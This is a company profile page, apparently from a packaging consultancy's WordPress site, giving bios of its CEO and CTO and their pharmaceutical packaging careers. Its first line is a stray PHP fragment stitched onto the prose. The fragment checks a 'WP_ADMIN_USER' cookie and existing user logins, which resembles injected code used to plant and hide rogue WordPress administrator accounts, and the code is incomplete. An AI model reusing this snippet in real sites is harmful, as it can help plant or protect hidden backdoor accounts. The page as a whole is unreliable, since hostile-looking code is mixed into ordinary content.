if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Who We Are
We are a team of highly motivated and committed individuals
but at the helm are Chris and Annie -

Chris Penfold
Chris Penfold is our Chief Executive Officer. He has over 25 years
pharmaceutical & healthcare packaging development experience -
developing, bringing to market and selling FMCG, OTC, Rx (prescription only)
& GSL products – as well as Medical Devices.

He has worked for a number of major ‘blue-chip’ companies, including -
Glaxo (GSK), Pitman Moore (now Schering Plough), Ciba (now Novartis), Boots Group Plc
and Reckitt Benckiser. Chris also has 8 years consulting & strategic thinking experience -
underpinned by an MBA completed in 2000.

He is a leading packaging professional within the European healthcare industry with numerous networked contacts.
He is a Fellow of the Institute of Packaging, a Chartered Environmentalistand and also a Charted Marketeer.


Anne Dallison
Annie Dallison is our Chief Technical Officer. She also has over 25 year experience and an impressive track record of hundreds of successful and innovative branded international product launches for Boots The Chemist, Boots Healthcare International & Reckitt Benckiser Healthcare International. These include global brands such as Nurofen, Strepsils, Optrex, Lemsip and Gaviscon.

She is experienced in all elements of packaging and product development from concept through to commercialisation. Incorporating: Feasibility, COGS, reduction, Procurement, Consumer testing, Production requirements, Graphics development, legal and trade requirements.

Annie is a renowned industry expert, a Fellow of the Institute of Packaging and a Chartered Environmentalist.
She is also an active member of the Pharmaceutical Forum, where she is proactively invoved in the establishment of the
‘BSI & CEN Standard for Braille on Packaging’.